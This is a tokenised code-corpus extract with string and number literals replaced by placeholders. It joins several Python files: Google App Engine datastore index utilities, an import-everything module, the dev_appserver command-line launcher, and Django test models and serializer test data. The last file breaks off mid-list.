<EOL> datastore_pb . Query_Filter . LESS_THAN_OR_EQUAL , <EOL> datastore_pb . Query_Filter . GREATER_THAN , <EOL> datastore_pb . Query_Filter . GREATER_THAN_OR_EQUAL , <EOL> ) ) <EOL> EXISTS_OPERATORS = set ( ( datastore_pb . Query_Filter . EXISTS , <EOL> ) ) <EOL> _DIRECTION_MAP = { <EOL> '<STR_LIT>' : entity_pb . Index_Property . ASCENDING , <EOL> '<STR_LIT>' : entity_pb . Index_Property . ASCENDING , <EOL> '<STR_LIT>' : entity_pb . Index_Property . DESCENDING , <EOL> '<STR_LIT>' : entity_pb . Index_Property . DESCENDING , <EOL> } <EOL> def Normalize ( filters , orders ) : <EOL> """<STR_LIT>""" <EOL> for f in filters : <EOL> if f . op ( ) == datastore_pb . Query_Filter . IN and f . property_size ( ) == <NUM_LIT:1> : <EOL> f . set_op ( datastore_pb . Query_Filter . EQUAL ) ; <EOL> eq_properties = set ( [ f . property ( <NUM_LIT:0> ) . name ( ) for f in filters if f . op ( ) == datastore_pb . Query_Filter . EQUAL ] ) ; <EOL> remove_set = eq_properties . copy ( ) <EOL> new_orders = [ ] <EOL> for o in orders : <EOL> if o . property ( ) not in remove_set : <EOL> remove_set . add ( o . property ( ) ) <EOL> new_orders . append ( o ) <EOL> orders = new_orders <EOL> if datastore_types . _KEY_SPECIAL_PROPERTY in eq_properties : <EOL> orders = [ ] <EOL> new_orders = [ ] <EOL> for o in orders : <EOL> if o . property ( ) == datastore_types . _KEY_SPECIAL_PROPERTY : <EOL> new_orders . append ( o ) <EOL> break <EOL> new_orders . append ( o ) <EOL> orders = new_orders <EOL> return ( filters , orders ) <EOL> def RemoveNativelySupportedComponents ( filters , orders ) : <EOL> """<STR_LIT>""" <EOL> ( filters , orders ) = Normalize ( filters , orders ) <EOL> has_key_desc_order = False <EOL> if orders and orders [ - <NUM_LIT:1> ] . property ( ) == datastore_types . _KEY_SPECIAL_PROPERTY : <EOL> if orders [ - <NUM_LIT:1> ] . direction ( ) == ASCENDING : <EOL> orders = orders [ : - <NUM_LIT:1> ] <EOL> else : <EOL> has_key_desc_order = True <EOL> if not has_key_desc_order : <EOL> for f in filters : <EOL> if ( f . op ( ) in INEQUALITY_OPERATORS and <EOL> f . property ( <NUM_LIT:0> ) . name ( ) != datastore_types . _KEY_SPECIAL_PROPERTY ) : <EOL> break <EOL> else : <EOL> filters = [ f for f in filters <EOL> if f . property ( <NUM_LIT:0> ) . name ( ) != datastore_types . _KEY_SPECIAL_PROPERTY ] <EOL> return ( filters , orders ) <EOL> def CompositeIndexForQuery ( query ) : <EOL> """<STR_LIT>""" <EOL> required = True <EOL> kind = query . kind ( ) <EOL> ancestor = query . has_ancestor ( ) <EOL> filters = query . filter_list ( ) <EOL> orders = query . order_list ( ) <EOL> for filter in filters : <EOL> assert filter . op ( ) != datastore_pb . Query_Filter . IN , '<STR_LIT>' <EOL> nprops = len ( filter . property_list ( ) ) <EOL> assert nprops == <NUM_LIT:1> , '<STR_LIT>' % nprops <EOL> if not kind : <EOL> required = False <EOL> ( filters , orders ) = RemoveNativelySupportedComponents ( filters , orders ) <EOL> eq_filters = [ f for f in filters if f . op ( ) in EQUALITY_OPERATORS ] <EOL> ineq_filters = [ f for f in filters if f . op ( ) in INEQUALITY_OPERATORS ] <EOL> exists_filters = [ f for f in filters if f . op ( ) in EXISTS_OPERATORS ] <EOL> assert ( len ( eq_filters ) + len ( ineq_filters ) + <EOL> len ( exists_filters ) ) == len ( filters ) , '<STR_LIT>' <EOL> if ( kind and not ineq_filters and not exists_filters and <EOL> not orders ) : <EOL> names = set ( f . property ( <NUM_LIT:0> ) . name ( ) for f in eq_filters ) <EOL> if not names . intersection ( datastore_types . _SPECIAL_PROPERTIES ) : <EOL> required = False <EOL> ineq_property = None <EOL> if ineq_filters : <EOL> ineq_property = ineq_filters [ <NUM_LIT:0> ] . property ( <NUM_LIT:0> ) . name ( ) <EOL> for filter in ineq_filters : <EOL> assert filter . property ( <NUM_LIT:0> ) . name ( ) == ineq_property <EOL> props = [ ] <EOL> for f in eq_filters : <EOL> prop = f . property ( <NUM_LIT:0> ) <EOL> props . append ( ( prop . name ( ) , ASCENDING ) ) <EOL> props . sort ( ) <EOL> if ineq_property : <EOL> if orders : <EOL> assert ineq_property == orders [ <NUM_LIT:0> ] . property ( ) <EOL> else : <EOL> props . append ( ( ineq_property , ASCENDING ) ) <EOL> for order in orders : <EOL> props . append ( ( order . property ( ) , order . direction ( ) ) ) <EOL> for filter in exists_filters : <EOL> prop = filter . property ( <NUM_LIT:0> ) <EOL> prop_name = prop . name ( ) <EOL> for name , direction in props : <EOL> if name == prop_name : <EOL> break <EOL> else : <EOL> props . append ( ( prop_name , ASCENDING ) ) <EOL> if kind and not ancestor and len ( props ) <= <NUM_LIT:1> : <EOL> required = False <EOL> if props : <EOL> prop , dir = props [ <NUM_LIT:0> ] <EOL> if prop in datastore_types . _SPECIAL_PROPERTIES and dir is DESCENDING : <EOL> required = True <EOL> unique_names = set ( name for name , dir in props ) <EOL> if len ( props ) > <NUM_LIT:1> and len ( unique_names ) == <NUM_LIT:1> : <EOL> required = False <EOL> return ( required , kind , ancestor , tuple ( props ) , len ( eq_filters ) ) <EOL> def IndexYamlForQuery ( kind , ancestor , props ) : <EOL> """<STR_LIT>""" <EOL> yaml = [ ] <EOL> yaml . append ( '<STR_LIT>' % kind ) <EOL> if ancestor : <EOL> yaml . append ( '<STR_LIT>' ) <EOL> if props : <EOL> yaml . append ( '<STR_LIT>' ) <EOL> for name , direction in props : <EOL> yaml . append ( '<STR_LIT>' % name ) <EOL> if direction == DESCENDING : <EOL> yaml . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT:\n>' . join ( yaml ) <EOL> def IndexDefinitionToProto ( app_id , index_definition ) : <EOL> """<STR_LIT>""" <EOL> proto = entity_pb . CompositeIndex ( ) <EOL> proto . set_app_id ( app_id ) <EOL> proto . set_id ( <NUM_LIT:0> ) <EOL> proto . set_state ( entity_pb . CompositeIndex . WRITE_ONLY ) <EOL> definition_proto = proto . mutable_definition ( ) <EOL> definition_proto . set_entity_type ( index_definition . kind ) <EOL> definition_proto . set_ancestor ( index_definition . ancestor ) <EOL> if index_definition . properties is not None : <EOL> for prop in index_definition . properties : <EOL> prop_proto = definition_proto . add_property ( ) <EOL> prop_proto . set_name ( prop . name ) <EOL> prop_proto . set_direction ( _DIRECTION_MAP [ prop . direction ] ) <EOL> return proto <EOL> def IndexDefinitionsToProtos ( app_id , index_definitions ) : <EOL> """<STR_LIT>""" <EOL> return [ IndexDefinitionToProto ( app_id , index ) <EOL> for index in index_definitions ] <EOL> def ProtoToIndexDefinition ( proto ) : <EOL> """<STR_LIT>""" <EOL> properties = [ ] <EOL> proto_index = proto . definition ( ) <EOL> for prop_proto in proto_index . property_list ( ) : <EOL> prop_definition = Property ( name = prop_proto . name ( ) ) <EOL> if prop_proto . direction ( ) == entity_pb . Index_Property . DESCENDING : <EOL> prop_definition . direction = '<STR_LIT>' <EOL> properties . append ( prop_definition ) <EOL> index = Index ( kind = proto_index . entity_type ( ) , properties = properties ) <EOL> if proto_index . ancestor ( ) : <EOL> index . ancestor = True <EOL> return index <EOL> def ProtosToIndexDefinitions ( protos ) : <EOL> """<STR_LIT>""" <EOL> return [ ProtoToIndexDefinition ( definition ) for definition in protos ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> _original_os_urandom = os . urandom <EOL> def os_urandom_replacement ( n ) : <EOL> raise NotImplementedError <EOL> os . urandom = os_urandom_replacement <EOL> import random <EOL> os . urandom = _original_os_urandom <EOL> random . _urandom = _original_os_urandom <EOL> import BaseHTTPServer <EOL> import Bastion <EOL> import CGIHTTPServer <EOL> import ConfigParser <EOL> import Cookie <EOL> import DocXMLRPCServer <EOL> import HTMLParser <EOL> import MimeWriter <EOL> import Queue <EOL> import SimpleHTTPServer <EOL> import SimpleXMLRPCServer <EOL> import SocketServer <EOL> import StringIO <EOL> import UserDict <EOL> import UserList <EOL> import UserString <EOL> import aifc <EOL> import anydbm <EOL> import atexit <EOL> import audiodev <EOL> import base64 <EOL> import bdb <EOL> import binhex <EOL> import bisect <EOL> import bz2 <EOL> import calendar <EOL> import cgi <EOL> import cgitb <EOL> import chunk <EOL> import cmd <EOL> import code <EOL> import codecs <EOL> import codeop <EOL> import colorsys <EOL> import commands <EOL> import cookielib <EOL> import copy <EOL> import copy_reg <EOL> import csv <EOL> import datetime <EOL> import difflib <EOL> import dircache <EOL> import dis <EOL> import doctest <EOL> import dumbdbm <EOL> import filecmp <EOL> import fileinput <EOL> import fnmatch <EOL> import formatter <EOL> import fpformat <EOL> import ftplib <EOL> import getopt <EOL> import getpass <EOL> import gettext <EOL> import glob <EOL> import gzip <EOL> import heapq <EOL> import hmac <EOL> import htmlentitydefs <EOL> import htmllib <EOL> import httplib <EOL> import imaplib <EOL> import imghdr <EOL> import imputil <EOL> import inspect <EOL> import keyword <EOL> import linecache <EOL> import locale <EOL> import logging <EOL> import macpath <EOL> import macurl2path <EOL> import mailbox <EOL> import mailcap <EOL> import markupbase <EOL> import math <EOL> import md5 <EOL> import mhlib <EOL> import mimetools <EOL> import mimetypes <EOL> import modulefinder <EOL> import multifile <EOL> import mutex <EOL> import netrc <EOL> import new <EOL> import nntplib <EOL> import ntpath <EOL> import nturl2path <EOL> import opcode <EOL> import optparse <EOL> import os2emxpath <EOL> import pdb <EOL> import pickle <EOL> import pickletools <EOL> import pipes <EOL> import pkgutil <EOL> import popen2 <EOL> import poplib <EOL> import posixpath <EOL> import pprint <EOL> import profile <EOL> import pstats <EOL> import pyclbr <EOL> import pydoc <EOL> import quopri <EOL> import re <EOL> import repr <EOL> import rfc822 <EOL> import robotparser <EOL> import sched <EOL> import sets <EOL> import sgmllib <EOL> import sha <EOL> import shelve <EOL> import shlex <EOL> import shutil <EOL> import site <EOL> import smtplib <EOL> import sndhdr <EOL> import socket <EOL> import stat <EOL> import statvfs <EOL> import string <EOL> import stringold <EOL> import stringprep <EOL> import struct <EOL> import sunau <EOL> import sunaudio <EOL> import symbol <EOL> import sys <EOL> import tabnanny <EOL> import tarfile <EOL> import telnetlib <EOL> import tempfile <EOL> import textwrap <EOL> import time <EOL> import timeit <EOL> import toaiff <EOL> import token <EOL> import tokenize <EOL> import trace <EOL> import traceback <EOL> import types <EOL> import unittest <EOL> import urllib <EOL> import urllib2 <EOL> import urlparse <EOL> import uu <EOL> import uuid <EOL> import warnings <EOL> import wave <EOL> import weakref <EOL> import whichdb <EOL> import xdrlib <EOL> import xml . parsers . expat <EOL> import xml . dom <EOL> import xml . sax <EOL> import xmlrpclib <EOL> import zipfile <EOL> import zlib <EOL> import neo_cs <EOL> import neo_util <EOL> import webob <EOL> import wsgiref . handlers <EOL> from google . appengine . api import datastore <EOL> from google . appengine . api import images <EOL> from google . appengine . api import mail <EOL> from google . appengine . api import memcache <EOL> from google . appengine . api import urlfetch <EOL> from google . appengine . api import users <EOL> from google . appengine . ext import bulkload <EOL> from google . appengine . ext import db <EOL> from google . appengine . ext import gql <EOL> from google . appengine . ext import search <EOL> from google . appengine . ext import webapp <EOL> from google . appengine . runtime import apiproxy <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . tools import os_compat <EOL> import getopt <EOL> import logging <EOL> import os <EOL> import signal <EOL> import sys <EOL> import traceback <EOL> import tempfile <EOL> logging . basicConfig ( <EOL> level = logging . INFO , <EOL> format = '<STR_LIT>' ) <EOL> from google . appengine . api import yaml_errors <EOL> from google . appengine . dist import py_zipimport <EOL> from google . appengine . tools import appcfg <EOL> from google . appengine . tools import appengine_rpc <EOL> from google . appengine . tools import dev_appserver <EOL> DEFAULT_ADMIN_CONSOLE_SERVER = '<STR_LIT>' <EOL> ARG_ADDRESS = '<STR_LIT:address>' <EOL> ARG_ADMIN_CONSOLE_SERVER = '<STR_LIT>' <EOL> ARG_ADMIN_CONSOLE_HOST = '<STR_LIT>' <EOL> ARG_AUTH_DOMAIN = '<STR_LIT>' <EOL> ARG_CLEAR_DATASTORE = '<STR_LIT>' <EOL> ARG_BLOBSTORE_PATH = '<STR_LIT>' <EOL> ARG_DATASTORE_PATH = '<STR_LIT>' <EOL> ARG_DEBUG_IMPORTS = '<STR_LIT>' <EOL> ARG_ENABLE_SENDMAIL = '<STR_LIT>' <EOL> ARG_SHOW_MAIL_BODY = '<STR_LIT>' <EOL> ARG_HISTORY_PATH = '<STR_LIT>' <EOL> ARG_LOGIN_URL = '<STR_LIT>' <EOL> ARG_LOG_LEVEL = '<STR_LIT>' <EOL> ARG_PORT = '<STR_LIT:port>' <EOL> ARG_REQUIRE_INDEXES = '<STR_LIT>' <EOL> ARG_ALLOW_SKIPPED_FILES = '<STR_LIT>' <EOL> ARG_SMTP_HOST = '<STR_LIT>' <EOL> ARG_SMTP_PASSWORD = '<STR_LIT>' <EOL> ARG_SMTP_PORT = '<STR_LIT>' <EOL> ARG_SMTP_USER = '<STR_LIT>' <EOL> ARG_STATIC_CACHING = '<STR_LIT>' <EOL> ARG_TEMPLATE_DIR = '<STR_LIT>' <EOL> ARG_TRUSTED = '<STR_LIT>' <EOL> SDK_PATH = os . path . dirname ( <EOL> os . path . dirname ( <EOL> os . path . dirname ( <EOL> os . path . dirname ( os_compat . __file__ ) <EOL> ) <EOL> ) <EOL> ) <EOL> DEFAULT_ARGS = { <EOL> ARG_PORT : <NUM_LIT> , <EOL> ARG_LOG_LEVEL : logging . INFO , <EOL> ARG_BLOBSTORE_PATH : os . path . join ( tempfile . gettempdir ( ) , <EOL> '<STR_LIT>' ) , <EOL> ARG_DATASTORE_PATH : os . path . join ( tempfile . gettempdir ( ) , <EOL> '<STR_LIT>' ) , <EOL> ARG_HISTORY_PATH : os . path . join ( tempfile . gettempdir ( ) , <EOL> '<STR_LIT>' ) , <EOL> ARG_LOGIN_URL : '<STR_LIT>' , <EOL> ARG_CLEAR_DATASTORE : False , <EOL> ARG_REQUIRE_INDEXES : False , <EOL> ARG_TEMPLATE_DIR : os . path . join ( SDK_PATH , '<STR_LIT>' ) , <EOL> ARG_SMTP_HOST : '<STR_LIT>' , <EOL> ARG_SMTP_PORT : <NUM_LIT> , <EOL> ARG_SMTP_USER : '<STR_LIT>' , <EOL> ARG_SMTP_PASSWORD : '<STR_LIT>' , <EOL> ARG_ENABLE_SENDMAIL : False , <EOL> ARG_SHOW_MAIL_BODY : False , <EOL> ARG_AUTH_DOMAIN : '<STR_LIT>' , <EOL> ARG_ADDRESS : '<STR_LIT:localhost>' , <EOL> ARG_ADMIN_CONSOLE_SERVER : DEFAULT_ADMIN_CONSOLE_SERVER , <EOL> ARG_ADMIN_CONSOLE_HOST : None , <EOL> ARG_ALLOW_SKIPPED_FILES : False , <EOL> ARG_STATIC_CACHING : True , <EOL> ARG_TRUSTED : False , <EOL> } <EOL> def PrintUsageExit ( code ) : <EOL> """<STR_LIT>""" <EOL> render_dict = DEFAULT_ARGS . copy ( ) <EOL> render_dict [ '<STR_LIT>' ] = os . path . basename ( sys . argv [ <NUM_LIT:0> ] ) <EOL> print sys . modules [ '<STR_LIT:__main__>' ] . __doc__ % render_dict <EOL> sys . stdout . flush ( ) <EOL> sys . exit ( code ) <EOL> def ParseArguments ( argv ) : <EOL> """<STR_LIT>""" <EOL> option_dict = DEFAULT_ARGS . copy ( ) <EOL> try : <EOL> opts , args = getopt . gnu_getopt ( <EOL> argv [ <NUM_LIT:1> : ] , <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> except getopt . GetoptError , e : <EOL> print >> sys . stderr , '<STR_LIT>' % e <EOL> PrintUsageExit ( <NUM_LIT:1> ) <EOL> for option , value in opts : <EOL> if option in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> PrintUsageExit ( <NUM_LIT:0> ) <EOL> if option in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> option_dict [ ARG_LOG_LEVEL ] = logging . DEBUG <EOL> if option in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> option_dict [ ARG_PORT ] = int ( value ) <EOL> if not ( <NUM_LIT> > option_dict [ ARG_PORT ] > <NUM_LIT:0> ) : <EOL> raise ValueError <EOL> except ValueError : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> PrintUsageExit ( <NUM_LIT:1> ) <EOL> if option in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> option_dict [ ARG_ADDRESS ] = value <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_BLOBSTORE_PATH ] = os . path . abspath ( value ) <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_DATASTORE_PATH ] = os . path . abspath ( value ) <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_HISTORY_PATH ] = os . path . abspath ( value ) <EOL> if option in ( '<STR_LIT:-c>' , '<STR_LIT>' ) : <EOL> option_dict [ ARG_CLEAR_DATASTORE ] = True <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_REQUIRE_INDEXES ] = True <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_SMTP_HOST ] = value <EOL> if option == '<STR_LIT>' : <EOL> try : <EOL> option_dict [ ARG_SMTP_PORT ] = int ( value ) <EOL> if not ( <NUM_LIT> > option_dict [ ARG_SMTP_PORT ] > <NUM_LIT:0> ) : <EOL> raise ValueError <EOL> except ValueError : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> PrintUsageExit ( <NUM_LIT:1> ) <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_SMTP_USER ] = value <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_SMTP_PASSWORD ] = value <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_ENABLE_SENDMAIL ] = True <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_SHOW_MAIL_BODY ] = True <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ '<STR_LIT>' ] = value <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ '<STR_LIT>' ] = True <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_TEMPLATE_DIR ] = value <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_ADMIN_CONSOLE_SERVER ] = value . strip ( ) <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_ADMIN_CONSOLE_HOST ] = value <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_ALLOW_SKIPPED_FILES ] = True <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_STATIC_CACHING ] = False <EOL> if option == '<STR_LIT>' : <EOL> option_dict [ ARG_TRUSTED ] = True <EOL> return args , option_dict <EOL> def MakeRpcServer ( option_dict ) : <EOL> """<STR_LIT>""" <EOL> server = appengine_rpc . HttpRpcServer ( <EOL> option_dict [ ARG_ADMIN_CONSOLE_SERVER ] , <EOL> lambda : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> appcfg . GetUserAgent ( ) , <EOL> appcfg . GetSourceName ( ) , <EOL> host_override = option_dict [ ARG_ADMIN_CONSOLE_HOST ] ) <EOL> server . authenticated = True <EOL> return server <EOL> def SigTermHandler ( signum , frame ) : <EOL> """<STR_LIT>""" <EOL> raise KeyboardInterrupt ( ) <EOL> def main ( argv ) : <EOL> """<STR_LIT>""" <EOL> args , option_dict = ParseArguments ( argv ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> PrintUsageExit ( <NUM_LIT:1> ) <EOL> root_path = args [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in option_dict : <EOL> auth_domain = option_dict [ '<STR_LIT>' ] <EOL> dev_appserver . DEFAULT_ENV [ '<STR_LIT>' ] = auth_domain <EOL> if '<STR_LIT>' in option_dict : <EOL> enable_logging = option_dict [ '<STR_LIT>' ] <EOL> dev_appserver . HardenedModulesHook . ENABLE_LOGGING = enable_logging <EOL> log_level = option_dict [ ARG_LOG_LEVEL ] <EOL> port = option_dict [ ARG_PORT ] <EOL> blobstore_path = option_dict [ ARG_BLOBSTORE_PATH ] <EOL> datastore_path = option_dict [ ARG_DATASTORE_PATH ] <EOL> login_url = option_dict [ ARG_LOGIN_URL ] <EOL> template_dir = option_dict [ ARG_TEMPLATE_DIR ] <EOL> serve_address = option_dict [ ARG_ADDRESS ] <EOL> require_indexes = option_dict [ ARG_REQUIRE_INDEXES ] <EOL> allow_skipped_files = option_dict [ ARG_ALLOW_SKIPPED_FILES ] <EOL> static_caching = option_dict [ ARG_STATIC_CACHING ] <EOL> option_dict [ '<STR_LIT>' ] = os . path . realpath ( root_path ) <EOL> logging . getLogger ( ) . setLevel ( log_level ) <EOL> config = None <EOL> try : <EOL> config , matcher = dev_appserver . LoadAppConfig ( root_path , { } ) <EOL> except yaml_errors . EventListenerError , e : <EOL> logging . error ( '<STR_LIT>' + <EOL> str ( e ) ) <EOL> return <NUM_LIT:1> <EOL> except dev_appserver . InvalidAppConfigError , e : <EOL> logging . error ( '<STR_LIT>' , e ) <EOL> return <NUM_LIT:1> <EOL> if option_dict [ ARG_ADMIN_CONSOLE_SERVER ] != '<STR_LIT>' : <EOL> server = MakeRpcServer ( option_dict ) <EOL> update_check = appcfg . UpdateCheck ( server , config ) <EOL> update_check . CheckSupportedVersion ( ) <EOL> if update_check . AllowedToCheckForUpdates ( ) : <EOL> update_check . CheckForUpdates ( ) <EOL> try : <EOL> dev_appserver . SetupStubs ( config . application , ** option_dict ) <EOL> except : <EOL> exc_type , exc_value , exc_traceback = sys . exc_info ( ) <EOL> logging . error ( str ( exc_type ) + '<STR_LIT>' + str ( exc_value ) ) <EOL> logging . debug ( '<STR_LIT>' . join ( traceback . format_exception ( <EOL> exc_type , exc_value , exc_traceback ) ) ) <EOL> return <NUM_LIT:1> <EOL> http_server = dev_appserver . CreateServer ( <EOL> root_path , <EOL> login_url , <EOL> port , <EOL> template_dir , <EOL> sdk_dir = SDK_PATH , <EOL> serve_address = serve_address , <EOL> require_indexes = require_indexes , <EOL> allow_skipped_files = allow_skipped_files , <EOL> static_caching = static_caching ) <EOL> signal . signal ( signal . SIGTERM , SigTermHandler ) <EOL> logging . info ( '<STR_LIT>' , <EOL> config . application , port , serve_address , port ) <EOL> try : <EOL> try : <EOL> http_server . serve_forever ( ) <EOL> except KeyboardInterrupt : <EOL> logging . info ( '<STR_LIT>' ) <EOL> except : <EOL> exc_info = sys . exc_info ( ) <EOL> info_string = '<STR_LIT:\n>' . join ( traceback . format_exception ( * exc_info ) ) <EOL> logging . error ( '<STR_LIT>' , info_string ) <EOL> return <NUM_LIT:1> <EOL> finally : <EOL> http_server . server_close ( ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( maxlength = <NUM_LIT:100> , default = '<STR_LIT>' ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> __test__ = { '<STR_LIT>' : """<STR_LIT>""" } <EOL> from django . test import TestCase <EOL> class SampleTestCase ( TestCase ) : <EOL> fixtures = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def testClassFixtures ( self ) : <EOL> "<STR_LIT>" <EOL> self . assertEqual ( Article . objects . count ( ) , <NUM_LIT:4> ) <EOL> self . assertEquals ( str ( Article . objects . all ( ) ) , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Category ( models . Model ) : <EOL> name = models . CharField ( maxlength = <NUM_LIT:20> ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> class Author ( models . Model ) : <EOL> name = models . CharField ( maxlength = <NUM_LIT:20> ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> class Article ( models . Model ) : <EOL> author = models . ForeignKey ( Author ) <EOL> headline = models . CharField ( maxlength = <NUM_LIT:50> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> categories = models . ManyToManyField ( Category ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> class AuthorProfile ( models . Model ) : <EOL> author = models . OneToOneField ( Author ) <EOL> date_of_birth = models . DateField ( ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % self . author <EOL> __test__ = { '<STR_LIT>' : """<STR_LIT>""" } </s>
<s> """<STR_LIT>""" <EOL> import unittest , datetime <EOL> from django . utils . functional import curry <EOL> from django . core import serializers <EOL> from django . db import transaction <EOL> from django . core import management <EOL> from models import * <EOL> def data_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> instance . data = data <EOL> instance . save ( ) <EOL> return instance <EOL> def generic_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> instance . data = data [ <NUM_LIT:0> ] <EOL> instance . save ( ) <EOL> for tag in data [ <NUM_LIT:1> : ] : <EOL> instance . tags . create ( data = tag ) <EOL> return instance <EOL> def fk_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> setattr ( instance , '<STR_LIT>' , data ) <EOL> instance . save ( ) <EOL> return instance <EOL> def m2m_create ( pk , klass , data ) : <EOL> instance = klass ( id = pk ) <EOL> instance . save ( ) <EOL> instance . data = data <EOL> return instance <EOL> def o2o_create ( pk , klass , data ) : <EOL> instance = klass ( ) <EOL> instance . data_id = data <EOL> instance . save ( ) <EOL> return instance <EOL> def pk_create ( pk , klass , data ) : <EOL> instance = klass ( ) <EOL> instance . data = data <EOL> instance . save ( ) <EOL> return instance <EOL> def data_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . assertEqual ( data , instance . data , <EOL> "<STR_LIT>" % ( pk , data , type ( data ) , instance . data , type ( instance . data ) ) ) <EOL> def generic_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . assertEqual ( data [ <NUM_LIT:0> ] , instance . data ) <EOL> testcase . assertEqual ( data [ <NUM_LIT:1> : ] , [ t . data for t in instance . tags . all ( ) ] ) <EOL> def fk_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . assertEqual ( data , instance . data_id ) <EOL> def m2m_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( id = pk ) <EOL> testcase . assertEqual ( data , [ obj . id for obj in instance . data . all ( ) ] ) <EOL> def o2o_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( data = data ) <EOL> testcase . assertEqual ( data , instance . data_id ) <EOL> def pk_compare ( testcase , pk , klass , data ) : <EOL> instance = klass . objects . get ( data = data ) <EOL> testcase . assertEqual ( data , instance . data ) <EOL> data_obj = ( data_create , data_compare ) <EOL> generic_obj = ( generic_create , generic_compare ) <EOL> fk_obj = ( fk_create , fk_compare ) <EOL> m2m_obj = ( m2m_create , m2m_compare ) <EOL> o2o_obj = ( o2o_create , o2o_compare ) <EOL> pk_obj = ( pk_create , pk_compare ) <EOL> test_data = [ <EOL> ( data_obj , <NUM_LIT:1> , BooleanData , True ) , <EOL> ( data_obj , <NUM_LIT:2> , BooleanData , False ) , <EOL> ( data_obj , <NUM_LIT:10> , CharData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT:11> , CharData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT:12> , CharData , "<STR_LIT:None>" ) , <EOL> ( data_obj , <NUM_LIT> , CharData , "<STR_LIT:null>" ) , <EOL> ( data_obj , <NUM_LIT> , CharData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT:15> , CharData , None ) , <EOL> ( data_obj , <NUM_LIT:20> , DateData , datetime . date ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:16> ) ) , <EOL> ( data_obj , <NUM_LIT> , DateData , None ) , <EOL> ( data_obj , <NUM_LIT:30> , DateTimeData , datetime . datetime ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:16> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) ) , <EOL> ( data_obj , <NUM_LIT> , DateTimeData , None ) , <EOL> ( data_obj , <NUM_LIT> , EmailData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , EmailData , None ) , <EOL> ( data_obj , <NUM_LIT:50> , FileData , '<STR_LIT>' ) , <EOL> ( data_obj , <NUM_LIT> , FileData , None ) , <EOL> ( data_obj , <NUM_LIT> , FilePathData , "<STR_LIT>" ) , <EOL> ( data_obj , <NUM_LIT> , FilePathData , None ) , <EOL> ( 